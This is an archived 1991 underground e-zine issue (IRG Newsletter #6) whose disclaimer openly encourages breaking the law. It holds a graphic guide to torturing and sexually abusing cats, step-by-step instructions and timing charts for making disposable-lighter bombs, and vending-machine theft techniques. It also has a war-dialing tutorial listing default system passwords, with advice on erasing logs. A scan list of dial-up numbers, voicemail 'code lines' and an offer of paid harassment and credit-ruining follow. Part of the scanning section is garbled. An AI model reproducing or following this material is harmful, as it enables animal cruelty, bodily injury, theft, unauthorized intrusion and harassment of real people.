💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › IRG › irg-06.phk captured on 2022-06-12 at 13:01:33.

View Raw

More Information

-=-=-=-=-=-=-

                 //////     ///////     //////// 
                  //       //    //    // 
                 //       ///////     //   //// 
                //       //    //    //     // 
             //////     //     //   ///////// 
              
      
      
    International Rogues Guild and Shadow/Net Presents...             
    IRG Newsletter v6.00              Released: 2/20/91  
    Written by: Haywire               Edited by: Haywire 
         
        Hi everyone, 
                Heres IRG number 6 for ya, more people are getting interested 
and I am happy about it.  Theres alot of good stuff this time(like always, 
hehe) so read up.   
 
 
 
 5.01 Table Of Contents 
 ---------------------- 
 5.01...................................Table Of Contents               
 5.02...................................Disclaimer 
 5.03...................................More About IRG 
 5.04...................................CyberPunk Follies 
 5.04b..................................State Of The Union Reply by Psycho 
 5.05...................................Letters From Prison 
 5.06...................................Planned Parent Hood For Cats by Damaged 
 5.07...................................Disposible Lighter Bombs by Psycho 
 5.08...................................Vending Machine Revenge by Psycho 
 5.09...................................The Art of Scanning by Control-S 
 5.10...................................Hacking CompuServe by Control-S 
 5.11...................................Dos Trips by Wasteland Warrior 
 5.12...................................Running The ShadowNet 
 5.13...................................VMB's From Hell 
 5.14...................................Hellos and Goodbyes  
                              
5.02 Disclaimer 
--------------- 
        All items in this newsletter are meant for informational purposes.  
It is written to encourage illegal activities, I hope the reader is inspired 
to break the law after reading all IRG Information.  Of course the authors of  
this newsletter cannot be held for anything that the reader does. 
        WARNING: Remember ALL explosives are dangerous, DO NOT, I repeat, DO 
NOT mess around with any of the recipes for explosives, EVER!  These recipes 
are real, they can kill you, and anyone else.  Make sure you know what you're 
doing.  Otherwise its your fault. 
 
5.03 More About IRG 
------------------- 
        We have one new ShadowNet member this issue and a new journalist. 
Hopefully you people are getting the idea and starting to write things for ANY 
group, just sharing the wealth of info out there.  Until next time... 
 
 
            IRG Members              Rank 
            -----------             ------ 
            Haywire                 IRG and ShadowNet Leader 
            Wasteland Warrior       Part Time Programer,Game Winner,IRG Member 
            Psycho                  (615)ShadowNet Member 
            Dr. Digital             (619)ShadowNet Member 
            Damaged                 IRG's "Sick" Member 
                 
            Journalist 
            ----------                
            Haywire 
            The Spectral Demon 
            Control-S 
            Kryptic Night 
            Psycho 
            Damaged 
            Wasteland Warrior 
                 
        Thats about it, if you feel like becoming a member of either IRG or 
ShadowNet.  Please call one of the IRG nodes.  If you would like to become and 
IRG node again contact one of the IRG nodes. 
 
 
5.04 CyberPunk Follys 
--------------------- 
        I have only gotten one reply to my "State Of The Union" speech, it 
seems that either people don't care what I say or they areto lazy to call up my 
board and give me a response.  It seems that the Hacking community has 
turned to shit more then I had thought.  But maybe people will get the idea one 
day and move on to a higher level. 
 
 
5.04b State Of The Union Reply by Psycho 
---------------------------------------- 
In response to Haywire's "State of Hacking Today" editorial in IRG #05, I would 
like to make the following comments: 
 
I agree with Haywire 100%- This shit over "Hacker Wars" has gotten WAY out of  
hand... What in the hell is wrong with people?!? Isn't hacking supposed to be a 
means by which we SHARE information and spread the wealth of knowledge? We  
hackers have before us an incredible realm of POWER- This has been exhibited  
time and time again; Everytime you hear of some kid who hacked into NASA or  
someplace and got caught, there are probably dozens more getting away with  
something just as spectacular. 
 
In short, we have the ability to manipulate and control the flow of ALL manner  
of electronic information. The authorities are starting to realize the actual  
scale to which systems can be hacked into, but it is far too late to do  
anything about it. For every hacker that gets busted, five more take his place- 
and it's a never-ending cycle. 
 
United and working together as one, hackers have the propensity to virtualy  
control (or shut-down) many facets of our society on a GLOBAL scale: banking,  
sattellite communications, military, law enforcement, etc., etc.... But instead 
of working together, the hacker community is splintered into many factions, all 
more or less working against each other. Instead of liberating information for  
all, we are instead battling it out in our own little area codes, searching for 
short-lived fame. 
 
I'm not saying that we should shut down all systems and holds the world's data  
for ransom; That would be futile. Instead, we need to help educate those with  
an interest in hacking but lack experience. Not that we should toss info out to 
anyone- There are still (and always will be) certain type of people that "just  
don't get it"... A little information and a lot of stupidity can be a dangerous 
thing with this type of "wanna-be". By a careful process of weeding out these  
types, the data will begin to flow into the hands of those that can best put it 
to use. 
 
So, in 1991, let's try to unify and SHARE our expertise- And I think you'll  
find that the hacking/phreaking community will benefit from this like never  
before. Hats off to Haywire and everyone else involved with the IRG for  
publishing this fine newsletter and making an effort for change. 
 
                                                             -Psycho 
 
5.05 Letters From Prison 
------------------------ 
        I have been getting alot of stuff, this issue and I am very happy about 
it.  The more the better, it always seems like I never have enough stuff.  This 
issue is pretty long getting into alot of good stuff.  This is a great issue 
check it out... 
 
 
5.06 Planned ParentHood For Phelines by Damaged 
----------------------------------------------- 
 
 
                          Phile #1 of a series Unknown 
 
 
                          @-@-@-@-@-@-@-@-@-@-@-@-@-@- 
                          -                          @ 
                          @  Planned ParentHood for  - 
                          -                          @ 
                          @         Phelines         - 
                          -                          @ 
                          @-@-@-@-@-@-@-@-@-@-@-@-@-@- 
 
                                   WRiTTEN BY: 
 
                                     Damaged 
                                     2.14.91 
 
 
  iNTRO  
 
   Ok dudes this is my phirst seriers of Anrkey philes on Kat's.  Don't you 
  just hate those little pussy's, i sure in the hell do.  Anyways,  the phile 
  is all How to do it yourself Home Kat abortions.  Why the reason for kats, 
  well i hate the goddamn shitheads for specific reasons.  That i won't get 
  into.  Well enjoy the phile and have phun. 
 
 
  SHiT YA'LL NEED  
 
  Propane torch 
  Koat Hanger 
  Gloves    <should be able to resist heat> 
  Rope                <optional> 
  Nails               <optional> 
  Hammer              <optional> 
  Drugs 
  & a Kat of kourse 
 
 
  GET'N STARTED  
 
   Ok, now get the above required stuff.  Now toke a little, phry or whatever 
  get's ya going.  Phirst off take the koat hanger and bend it into a phairly 
  straight wire.  Take the koat hanger and make a noose on one end.  You need 
  to make sure that the noose is small enuf to phit into da Kat's Kunt. 
 
  PHUN PART  
 
   Ok now go out and phind yer victim.  Well you have phound a kat, put on 
  the gloves so you don't get scratch to hell and back.  Now this is where 
  the optional shit komes in.  You kan either Nail the phucker to the ground 
  by hammer'n nails thourgh it's pheet.  This technique i phind to be the most 
  effective.  Or if your one of those squemish types (why the phuck are you 
  read'n this then??) you kan use the rope.  Just spread the phucker's legs 
  to the phour korners.  Tie the rope around each paw and tie to something 
  else.  Now you have the kat down supplied and bagged.  Reach over and grab 
  your nice instrument(koat hanger) and also grab the torch.  Now you should 
  be still wear'n the gloves, if not jack'n off will be a little harder phor 
  you to do now.  Anywayz, heat up the end of the noose with the oval end or 
  however the phuck you made it.  Wait until the shit is shine'n real bright 
  orange or yellow.  Some koat hangers will even turn white, now make sure 
  you don't melt the damn noose. duh  Insert the heated end of the noose into 
  the kat's kunt, now jam the phucker all around, make sure you get every last 
  one of those bastard kittens outta there.  After you have phinished, unnail 
  or untie the kat.  Now i doubt it will walk away, but if you know who owns 
  that kat, be a phriendly neighbor and drop it off at their house phor them. 
  Now you really don't know which Kat is or not pregneat so hell try evey one 
  of those pussy's.  Now this also works for dogs, and even try this on yer 
  girlphriend if you even knock her up. 
 
 
  OTHER SiCK SHiT  
 
   Now some other phun shit to do while do'n this.  Bring along a tape recorder 
  or a kamcorder and record the shit.  Go home listen or watch it over and 
  over again.  Loads of phun dude.  Now for you sick perverts,  take a knife 
  and just make the kat's kunt big enuf to slide yer dick in, hell a phree 
  phuck.  You kould also bang the phucker up the ass to if ya wanted.  The 
  best part about this is that it's like bust'n a virgin everytime and you 
  don't have to wear a kondom either!  Oh yea while ya do this phry really 
  hard too. 
 
  Yo'S & PHUCK oFF'S  
 
  Yo's to LoL-PHUCK, THG for thier latest kracks, Sam Brown for all his nice 
  back doors to Emulex, METALLiCA, Lutzifer, and all who think that they deserve 
  some yo's (yea right) 
 
  Phuck off's to PE Give it up, THG got yer ass Kicked, Acid Alliance, QSD 
  lamers, Alto's you need to UPGRADE big phuck'n time, leeches, and all those 
  K-Rad K0de KiDZ who do noth'n but phuck'n leech as hell and get Kaught too. 
 
 
  KALL THESE KiCK'N SiSTEMS  
 
    Insanity Lane..........619.591.4974     -=> IRG HQ <=- 
    Zanaphopia.............404.642.8703     -=> AoA HQ <=- 
    The Corrupt Society....619.630.8450     -=> NHA HQ <=- 
    Demon's Crypt..........516.791.1427     -=> SoC HQ <=- 
    Phreak Accident........404.977.4272 
 
 
  Latur dudes 
      Damaged 
 
 
[--------------------------------- EOF ----------------------------------] 
 
 
5.07 Disposable Lighter Bombs 
----------------------------- 
 
                                ************** 
                                *            * 
                                * Disposable * 
                                *   Lighter  * 
                                *    Bombs   * 
                                *            * 
                                ************** 
 
                                   by PSYCHO 
 
                        Written EXCLUSIVELY for The IRG 
 
 
 
For those of you who are budding anarchists or Mad Bombers, but don't feel 
comfortable cooking up nitroglycerine in your mom's kitchen or making pipe 
bombs in the garage, here's a fairly decent alternative that is safe, easily 
transported, cheap, and effective if used properly. 
 
All you need is a good supply of those shitty disposable lighters, like a Bic 
for instance. These can be bought cheaply (or stolen, if you're so inclined) at 
every damn convenience store between here and East Camelfuck, Iraq. Prices  
range from about 39 cents for averaged-sized lighters, up to about $1.79 for  
the extra-large ones, such as the Cli-Cla (my personal favorite- it is a HUGE 
disposable, holding about 65% more butane than the large Bic! They're available 
at fine truck stops everywhere...). Here is a chart to help you decide which 
lighter is best for your explosive needs: 
 
        Lighter                   | Size of Explosion * 
       ---------------------------|---------------------------------- 
        Mini Bic                  | Small; 4 to 6 inch fireball 
                                  | 
        Scripto                   | Medium; 6 to 12 inch fireball 
                                  | 
        Regular Bic               | Large; 12 to 18 inch fireball 
                                  | 
        Cli-Cla                   | HUGE; 24 to 30 inch fireball 
       -------------------------------------------------------------- 

        fireball size and intensity may be affected by such factors as  
atmospheric pressure, wind speed, humidity, manufacturing defects, etc.  
Your results will vary.) 
 
As you can see by the above chart, some of these lighters can be quite  
powerful. To give you a better frame of reference, consider the Mini Bic to be  
as powerful as an average firecracker, the regular Bic as powerful as an M-80  
firecracker ( a REAL M-80... You can only get them illegally in this country-  
they are equal to 1/4 stick of dynamite), and the Cli-Cla as powerful as 1/3 to  
1/2 stick of dynamite, under perfect conditions. 
 
 
                     PREPARATION AND METHODS OF DETONATION 
 
To prepare a lighter for use as an explosive device, the only real modification  
that must be made is the removal of the flame guard. The flame guard is the  
semi-elliptical piece of metal that is found on top of the lighter which  
encases the gas jet and flame adjustment mechanism (if present). This is easily  
removed by using a screwdriver (or even a finger) to pry away one edge of the  
flame guard, and thus popping the whole thing loose. 
 
With the above out of the way, you are ready for the placing of the device.  
Keep in mind that since the laws of physics declare that a force will always  
follow the path of least resistance, some forethought should go into the  
placement of the device for best results. If you just want a purely-for-the- 
hell-of-it explosion, the lighter can be placed on open ground, but for a  
specific purpose, such as the destruction of an object, opening of a door,  
etc., the lighter will need to be wedged as tightly as possible against the  
target. 
 
The only "timing device" you will have, such as it is, is the actual flow of  
gas from the lighter. Some lighters have no flame adjustment mechanism, and  
thus you have very little control over when the explosion will take place. On  
lighters where the control is present, you will be able to approximate the  
point at which detonation will occur. This is accomplished by turning the  
adjustment wheel toward the <+> or <->, with the <+> side naturally exploding  
faster. In some lighters, the maximum <+> setting can be over-ridden to allow  
the butane to escape very quickly, but keep in mind that the faster the gas  
escapes, the lower the power of the resulting explosion. You may find some  
experimentation necessary with different types of lighters you plan to use       
before you can become familiar with the approximate detonation times. 
 
Once you have decided on a target and length of time needed to escape and/or  
take cover, you are now ready to ignite the lighter. The most important element  
to keep in mind it that the gas release lever MUST remain depressed for the  
duration of time until the explosion occurs. There are many methods for  
assuring this, as pointed out below: 
 
    A. Wedge the lever in the open position by placing an object between it and   
 
   the striking wheel. 
 
B. Glue the lever down with a glob of Crazy Glue. 
 
C. Tape the lever down with aluminum strapping tape (regular tape will not    
   work due to rapid melting). 
 
D. Wire the lever down with a few inches of light-gauge copper wire. 
 
These methods are not the only absolute choices you have, but I have always had  
good luck with them. 
 
Once the lever has been secured, you need to act as quickly as possible, to  
ensure as little butane as possible is wasted. Using another lighter, ignite  
the stream of gas escaping from the one you want to explode. Another factor you  
might want to consider for timing is the physical direction of the tank of the  
lighter in relation to the flame- If the flame is above the tank (as in normal  
operation), it will take much longer for the heat to melt the plastic and cause  
the detonation than it would if the tank was placed at a 45-or-so degree angle  
with the flame being BELOW the tank. Here is a chart of approximate times based  
on positioning of lighter and gas flow: 
 
 
               Gas    |   Lighter Upright   |  Lighter Inclined 
               Flow   |  (flame above tank) | (flame below tank) 
              ================================================== 
               MIN.   |     5-10 minutes    |     3-5 minutes 
              --------|---------------------|------------------- 
               MED.   |     3-5  minutes    |     1-3 minutes 
              --------|---------------------|------------------- 
               MAX.   |     1-3 minutes     | 60 seconds or LESS 
 
Again, these figures are APPROXIMATE- Times will vary according to many factors  
including, material used in manufacture, quality of butane, etc. 
 
Using the above chart as a guide, plus some experimentation on your own, you  
should be able to discern timing factors relating to your individual needs in  
certain situations. Of course, lighting the butane and allowing it to melt the  
plastic tank casing is not the only method for detonating disposable lighters- 
other possibilities include: 
 
    * Affixing a large firecracker or other small explosive device to the tank 
 

 

pipe, oven, space heater, etc) 
 
As you can see, however and wherever you choose to use a lighter as an  
explosive, it is a cheap and (usually) ample solution. Always use great care  
and common sense when handling ANY explosive device, and have your escape route  
or cover picked out well in advance. Also be aware that, due to the materials  
used in it's construction, an exploding lighter will hurl bits of metal and  
molten/flaming plastic, sometimes for several yards in all directions. 
 
                                HAPPY BOMBING! 
 
Thanks to: Haywire & The MIGHTY IRG! 
 
Special Thanks to: The Phantom Fireman for his pyromania expertise. 
 
 
5.08 Vending Machine Revenge 
---------------------------- 
 
 
                            VENDING MACHINE REVENGE 
 
 
                                   by Psycho 
 
                              Written for the IRG 
 
 
 
How many of you have ever been ripped off by a vending machine? I would guess  
that EVERYBODY, at one time or another (and probably MANY times), has met up  
with a "change eater". This can be frustrating as hell, especially if you're  
hungry or thirsty and the machine took all the change you had. Worst of all,  
many times the owner of the machine takes his sweet time getting it fixed-  
After all, any money you lose is pure profit for him. The following is a  
collection of various techniques that have been used with great success to  
extract revenge on these money-grubbing bastards, and can put a few bucks in  
your pocket as well. I guess some unscrupulous person COULD use this  
information just to rip off other hapless consumers, but that is their  
discretion (ha ha!). 
 
1.0 SLUGGING 
    This is one of the most common forms of Vending Machine Revenge (from  
herein referred to as VMR), and also one of the safest. Basically this  
involves putting something into the machine that is not a coin, but the  
machine will think it is. Experimentation of a high degree will be in order  
here, as all machines have different levels of sensitivity. Some of the  
more common items used include: metal washers, arcade tokens, foreign  
coins, plastic discs, etc. I think you get the idea. I have even heard of  
people using a bench grinder to file pennies down to dime size, but that  
seems like an awful lot of work for 9 cents, but how you want to spend your  
time is up to you. Again, you'll have to experiment a lot with this one. If  
anyone finds some that work particularly well, leave me a message on the   
IRG/Insanity Lane node, and I'll draw up a chart for a future issue. 
 
 
2.0 TIPPING 
Another quite popular method, this is accomplished by physically tipping  
the machine forward as far as you can get it, hence the name. This works  
best on those machines that have potato chips and stuff dangling from long  
metal rods, and also those that use spiral rods to hold the stuff. If you  
want to use this method of VMR to the fullest, it's best to take along a  
couple of stout friends. Reason being, you will get the best results by  
practically putting the front of the machine down to the floor, and some of  
these bastards can be REAL heavy. So, DON'T try this one alone (unless you  
look like Arnold Schwarzeneggar), and make sure you do it quietly and in an  
out of the way area to avoid getting caught. 
 
3.0 ROCKING 
The Rocking method for VMR is similar to the above, but is seems to work  
best on coke machines which dispense cans. To get free cokes, you rock the  
machine back and forth, really banging the hell out of it. This confuses  
the machine's coin mechanisms, and it will usually start spitting out  
cokes. This VMR method will also require the assistance of friends, for  
obvious reasons (coke machines are the heaviest of all vending machines).  
This one must also be executed in a very deserted place, due to the  
excessive noise level created. You'll also want to remember to take along  
some backpacks, pillowcases, etc., to put your free cokes in. I have seen  
machines completely emptied using this method. 
 
4.0 PLUGGING 
So far, we've only discussed methods with which you can obtain free snacks-  
Now, here's one that can net you some good pocket change. Unfortunately,  
this will only work as described on newer coke machines. Perhaps with  
experimentation, it can be adapted for use on other machines. Plugging is  
accomplished by doing just that- you use something which will get hung in  
the coin slot, such as a penny, slug, etc., but will still fall through  
when the coin return is pressed. On newer coke machines, the coin return is  
a long piece of horizontal metal that presses straight down. After  
inserting your plug, use a flat-blade screwdriver to bend the coin return  
bar so that it cannot be depressed. Now, take the rest of the day off and  
do whatever. When you return later that night, use your screwdriver to bend  
the return lever in the other direction. When you press it down- JACKPOT!  
You get all the coins that other people have "lost" that day. Rotate among  
different machines, and don't plug the same one more than once a week to  
obtain best results. By doing this to enough machines in various locations,  
it's possible to make around $100 PER DAY (the average take for one machine  
is usually around $5). Another good place to do this occasionally is coke  
machines in expensive hotels, since they usually inflate the price of their  
drinks by 50% over normal machines. Be extremely careful and don't get TOO  
greedy, and this method is very safe. 
 
5.0 JAMMING-1 
This type of VMR is one of the best for getting lots of free stuff. What  
you do is actually jam the "product chute" (where the goods come out). Any  
manner of things can be used to do this. For instance, open the little door  
on a coke machine where the cans come out. Now, take a stick, huge wad of  
paper, etc., and cram it as far up into the machine as you can comfortably  
reach. This will block the arrival of anyone's purchase, and you only have  
to pull out whatever you blocked it with on your return to retrieve the  
stuff. On cigarette machines, you can even put tape over the side slot  
where the smokes are dispensed to accomplish this. As in some of the above  
methods, experimentation will be in order here to learn about the machines  
in your area. This is a fairly safe method of VMR. 
 
6.0 JAMMING-2 
This is the same as the above method, but instead you jam the change return  
slot. It's not as profitable as screwing up the coin return, but hey- it's  
FREE money. You may have to use a small wire to accomplish this on machines  
that have a small door that opens inward on the change slot. Again, if done  
smartly and not too often to the same machine, this VMR method is safe. 
 
7.0 ZAPPING 
Personally, I have never been able to get this one to work, but I know  
people that swear by it and say they use it all the time. Also known as  
"shorting", this type of VMR involves locating the socket where the machine  
is plugged in, and rapidly working the plug back and forth, causing the  
electronics in the machine to screw up. I'm told it only works on machines  
that have an LED display showing the amount you've dropped in. One person  
claims to have "maxed-out" the display at $9.99 and got that much OUT of  
the machine when he hit the coin return! Like I said, I've never been able  
to do this, but there are lots of people who claim it can be done.  
Experiment and find out for yourself, and drop me a line if you get it to  
work. 
 
8.0 KILLING 
This isn't as drastic as it sounds- It actually means that you unplug the  
machine, thus "killing" the power to it. Some machines, when unplugged,  
will simply NOT return any coins. And, you'd be surprised at how many  
people will go ahead and stick money in a machine, even if it's not lit  
up... And most people won't look for the plug to check it, either. This is  
a very safe, quiet method that has been proven to work on certain machine.  
As before, experiment with machines in your local area. 
 
Well, that should be enough ideas to get you started- I'm sure there are many,  
many more. If you have a particular favorite, leave me e-mail on Insanity Lane  
and I'll include them in any future updates of this article. In the meantime,  
just remember not to get too greedy, and you can have a tidy little income from  
your VMR exploits. 
 
Thanks go to: Haywire & the IRG for publishing the newsletter and allowing me 
              to write this article. 
 
Special thanks to: The Bubblegum Bandit, H.R. Puffenstuf, & Headhunter for     
                   their input in compiling this article. 
 
 
5.09 The Art Of Scanning by Control-S 
------------------------------------- 
 
 
                     +++++++++++++++++++++++++++++++ 
                     ++                           ++ 
                     ++        The Art Of         ++ 
                     ++    *->> Scanning <<-*     ++ 
                     ++                           ++ 
                     ++       By: Control-S       ++ 
                     ++                           ++ 
                     +++++++++++++++++++++++++++++++ 
 
 
This file is written for International Rogues Guild (IRG), and is 
the second in a series of files aimed towards the begining hacker. 
If you've been around a while, you will most likely find nothing 
of use here. 
 
 
Part 1: Scanning, the art of 
Part 2: Scan-Pages v1.00 
 
 
Disclaimer: This phile is for informational purposes only, and I 
cannot be held responsible for the actions of anyone reading it. 
 
WARNING: If the words "k-kewl", "d00d", or "k-elyte" are a part of 
your every day vocabulary, stop reading now, you are to far gone for help.  
 
 
Scanning: 
 
Scanning is one of the most legal aspects of hacking, and a lot of fun too. 
I'm not saying that scanning IS legal, I really doubt you could get anyone 
to answer that question. If the SS wants to bust you, they will do it for 
scanning, or anything else they feel like, if theres no law against it, 
they will make one up! You can't win, so I would just recommend that you 
watch your step no matter what you do. 
 
You can scan many diferent places, like x25 networks such as TymNet and 
Tele(Sprint)Net or simply telephone exchanges, which is what I'll be  
going into here: Scanning your local exchanges, I basically view this as 
'getting to know your neighborhood' - its good to get an idea of how  
many modems are in yer area, and just what sort of 'puters are connected 
to them. You'll more than likely come across a few Unixes, and some VMS', 
if you're lucky, you'll find a LAN or WAN, and be able to reach a bunch 
of different systems from one number, some of these even connect to far 
systems, some with outdials (which you can scan other areas through), or 
gateways (where you can hook into even more systems and/or psn's).  
 
 
 
Things You Need: 
 

 every type of computer, but if you can't find one, they are easy to 
 write yourself, in either basic or even scripting. (I would highly 
 recommend you write your own, its a good way to get started programming 
 and you can customize it to do exactly what you want it to.) 

 text files or manuals that will help you identify the systems you find, 
 and then give you and idea of how to get in and possibly use them. 
 (You can find detailed 'how to' files on just about any operating 
 system you might find in many Phrack newsletters, if you don't have 
 them all, get them!) - (See appendix A of this file for simple system 
 identification). 

 
 
Getting Started: 
 
 
Using that little bit of common sense, you should fire up your computer 
and modem. (If you can't get by this part, you should stop reading this 
file immediately, run down to your nearest computer store, and trade 
your PC in for a nintendo!) 
 
For best results, you will want to do some sort of sequential scan, this 
way you won't miss any carriers. If you are paranoid about leaving a 
sequential patern, (the SS looks for this sometimes, trying to catch 
'c0dez kidz') then you will have to make some part of the dialing random. 
Making the whole scan random has a few problems; if you wan't to make sure 
you get all of the numbers, and don't keep going over the same ones, you 
have to keep track of all the numbers dialed and check it every time 
before dialing. This is a big waste of time, the best way to do a sequential 
scan without a patern, is to use a node dialer. Node dialers are common 
in code hacking programs, and these are easilly modified to just scan. 
The ideal configuration for a node dialer (the one I use) would be to 
use 10 nodes, each scanning 1000 numbers in the same exchange, then just 
randomize which node is dialed. 
Example: 
 
Node 1 Dials 0000->0999 
Node 2 Dials 1000->1999 
Node 3 Dials 2000->2999 
Node 4 Dials 3000->3999 
Node 5 Dials 4000->4999 
Node 6 Dials 5000->5999 
Node 7 Dials 6000->6999 
Node 8 Dials 7000->7999 
Node 9 Dials 8000->8999 
Node10 Dials 9000->9999 
 
ATDT <prefix>+<random node> 
 
This method is just as fast as dialing them straight out, you don't 
miss any numbers, re-dial any numbers, and you aren't using any 
detectable dialing pattern (other than possibly 300 calls per hour). 
 
 
Now that you've got your dialer configured, you need to find a good time 
to scan. Again, if you're paranoid, you should stick to scanning 
between 9AM and 5PM. This is for two reasons; 1) This is the when most 
buisness calls are made, and in the huge volume, you will be that much 
harder to detect. 2) If you DO get busted (can you imagine going to court 
for such a thing? hah!) you will have a good case, as many people dial 
sequential numbers durring this time, (re: telemarketers, surveys...). 
This is also probably the time when you'll be at work/school/whatever, 
so you won't be needing your CPU. (I personally scan while I'm asleep, 
at night - I'm not that paranoid!) As a rule of thumb, don't watch the 
dialer. For some reason, no carriers are detected while you watch the 
scan in process. (I've heard rumors that this is the result of a minor 
disturbance in the local space-time-continuum caused by invisible  
emissions from the iris, but have seen no proof to back this theory.) 
 
Okay, now you have your dialer ready and a good time to scan. Fire it 
up and check on the progress every few hours. After you scan out a fair 
sized list of carrier signals, you should give the dialer a rest, boot 
your favorite term program, and investigate all your finds. Don't expect 
to see something like this: "Welcome SysOp!" on the systems you check,  
in fact, expect nothing. Many systems don't wave any banners or tell 
you anything, you have to try and coax a responce out of them. Things 
to try would be: <Carriage Return>'s, Ctrl-C, or any other Ctrl-'s, 
(if you send a Ctrl-S, be sure to send a Ctrl-Q after it, because many 
systems use this as a 'halt-output' switch, and you may discover the 
right keys to press, but never know it because all output is stopped. 
Try sending "..." or @'s, [Esc], and sending a hard break almost always 
gets some responce, if none of the above work, try any character on  
the keyboard, and words like "boot, start, run, load, logon, login". 
If you have an external modem, keep an eye on the "Recieve Data" light, 
if it flickers and you aren't getting anything echoed to your screen, 
or possibly a lot of garbage characters, switch to 7E1, or call back 
at a lower baud rate. (I've found a bunch of systems with modems that 
will connect you at 2400, but the com ports will only transfer data 
at 1200 or 300) If you try everything and can't get any responce at all, 
it could be a company which turns its computers off at night, but 
leaves the modem on (so call back in the day), a crashed system, or 
a hacker who got your scan-call at 3am and wistled an unerring 8N1 
into his reciever at a steady speed of 2400 bits per second. -heh 
 
When(if) you identify the operating system, break out your references, 
and try all the default accounts. If you get in on a default, but 
you're unfamiliar with the particular OS, don't mess around, just log 
off and do a little research, learn how to turn off all the logging and 
cover your tracks, then go back and have phun to your hearts content. 
 
Remember: keep notes on all the systems you find. You never know when 
some ancient OS might come in handy, or what you might find that 
relates to any system while trashing at a later date! 
 
 
 
Apendix A: 
 
The following is a short chart to help you identify operating systems. 
 
System     Prompt                Default Accounts/Passwords 
---------  --------------------  ------------------------------------- 
Unix       login: -or- Login:    root,daemon,bin,sync,uucp/(unpassworded) 
 
VAX        Username:             SYSTEM/MANAGER -or- FIELD/SERVICE 
 
DEC-10     User ID:              1,2/ ? 
 
HP-?000    PLEASE LOG IN:        HELLO,MANAGER, 
 
Iris       ACCOUNT ID?           MANAGER 
 
VM/CMS     IBM VM/370 ONLINE     logon (user id) 
 
NOS        FAMILY: 
 
Primos     "PRIMENET XX.X.XXX"   login SYSTEM/SYSTEM -or- OPERATOR 
 
 
 

  try and compile your own list, and add new systems to it regularly. 
 
 
 
   This has been a phree Speech publication, (C) pSp and IRG 1991 
 
 
As usual, I can be contacted for whatever on any of the IRG nodes, or 
IRG e-mailing addresses. Please mark all comments "Attn: Ctrl-S". 
 
 
              Control-S, Freelance G-File Artist (for hire) 
 
 
 
 
 
 
Scan-Pages v.99b: 
 
Note: Unfortunately, I will be unable to finish my current scan in time 
for the next IRG release, so I stuck this partial scan in to fill the  
spot. Look for a complete scan in v1.00, next IRG. 
 
 
NPA/NUM-BER    Baud   System/Comments 
------------   -----  -------------------------------- 
619/259-0038   n/a    ?/constant tone 
619/270-0017   1200   ?/has echo on 
619/270-0038   2400   ?/"Unauthorized User, Call Recorded and Disconnected" 
619/753-0006   n/a    ?/constant tone (may be loop) 
619/753-0013   n/a    ?/constant tone 
619/753-0171   1200   ?/"D29 System C, Node XX, Line XX" 
619/753-0172   1200   ?/"D29 System C, Node XX, Line XX" 
619/753-0173   1200   ?/"D29 System C, Node XX, Line XX" 
619/753-0174   1200   ?/"D29 System C, Node XX, Line XX" 
619/753-0175   1200   ?/"D29 System C, Node XX, Line XX" 
619/753-0176   1200   ?/"D29 System C, Node XX, Line XX" 
619/753-0243   2400   ?/(sending a hard break makes hangup)   
619/753-0287   1200   TRW Dialup 
619/753-0288   1200   TRW Dialup 
619/753-0548   1200   ?/"D29 System C, Node XX, Line XX"  
619/753-0716   1200   ?/"ALPHA BASE, PLEASE LOG IN:" 
619/753-0738   1200   ?/(just hangs up, maybe callback security?) 
619/753-0911   1200   ?/(response to break ^Z) 
619/753-0916   1200   ?/(response to break ^Z) 
619/753-0933   1200   ?/(response to break ^Z) 
619/753-0962   1200   ?/(response to break ^Z) 
619/753-0981   2400   HP-?0000/PLEASE LOG IN: (try 'help') 
619/753-1550   2400   PC-Plus Host Mode/ American Bamboo Society 
619/753-2614   1200   ?/(absolutely no activity - a modem with no 'puter?) 
619/753-2728   2400   "Host Name:" (^C will get "User ID:") (CIS, node ENC) 
619/753-1654   2400   ?/Esc will get "ACCOUNT-ID: / PASSWORD:" 
619/753-1079   1200   ?/"D29, System C, Node XX, Line XX" 
 
 
 
 
        This is hardly a complete list, its more or less the result 
of boredom, and fairly random scanning through an outdial, it does 
cover about 1/3 of the 619-753 exchanange, but I never finished because 
of lack of time and other projects taking precedence. I would like 
to try and organize a concerted effort to map out any/all NPA's, and 
eventually publish a masterlist of all detectable carrier signals. Its 
easy to do, and you can usually let yer computer scan while yer gone 
to school/work, so if you'd be interested in helping out, leave me a 
note on one of the IRG boards and tell me the NPA and exck?n?es you'd 
be `BLe to scan, via local call or some sort of outdial, so we can make 
sure that different people aren't wasting time scanning the same exchanges! 
Anyone who helps to build the list will g1 at Glasgow 
End of file - Frm    9; Next> 
 
 
 
6.BBSs From Hell 
---------------- 
        Here is this issue's installment of BBSs From Hell. 
 
Board Name                      Phone Number      NUP       SysOp 
------------------------------------------------------------------------------- 
Shadow's Of Doom                313/274-5630      ?          ? 
Fornax                          408/370-0722      ?          Briareos 
The Rocky Mountains             714/530-6258      ?          ? 
The CorrupT SocieTy             619/630-8450      Defiance   The Spectral Demon 
Land Of Karrus                  215/948-2132      Nightmare  Scooter 
 
Next issue we will have five more Elite BBSes for you to try.  Sorry if I have 
placed your bbs number on here without your knowing, if you would like it 
removed from the master list please E-mail me at Insanity Lane 619-591-4974 
NUP: Last Try. 
 
 
7.VMBs From Hell 
---------------- 
        Heres a little plus I decided to have in each IRG news, a VMB list it 
will work like the BBS list in that I will have 5 VMBs each issue and every so 
often I will have a master list printed.  All changes to VMBs will be posted in 
each IRG News. 
 
VMB Number           Box Number               VMB Use 
------------------------------------------------------------------------------- 
1-800-877-7594                                Code Line 
1-800-848-1488       * 0                      Code Line / Info Line 
1-800-741-5881       9 + * * 1111             Code Line / Info Line 
1-800-950-0203       289                      Time Lord's Code Line/ Info Line 
1-800-950-0203       617                      Code Line / Info Line 
 
Well thats it for this installment of VMBs From Hell.  If you would like you 
VMB in IRG News please leave mail at IRG/ShadowNet VMB #1 1-800-527-0543 Box 
Number: 8 + 158. 
 
 
8.Running The ShadowNet 
----------------------- 
        ShadowNet is the newest addition to IRG.  It is a information service 
for anyone willing to pay.  ShadowNet works the way a Private Investigator 
works...you pay us to find out information on people, except we will do much 
more than that. 
 
        We will go one step farther than any PI would go.  We will change his 
phone #, send him 100 pizzas, or ruin his credit rate.  Of course the more you 
pay the better you get.  At the beginning we will work for free to show that we 
can do what you ask.  So get your orders in fast.  All we need is a name, phone 
number, handle, whatever.  The more information you start giving us the 
more you will get back.  I also am in need of "agents" or people to help work 
with me.  I hope to get at least one person in each area code so information 
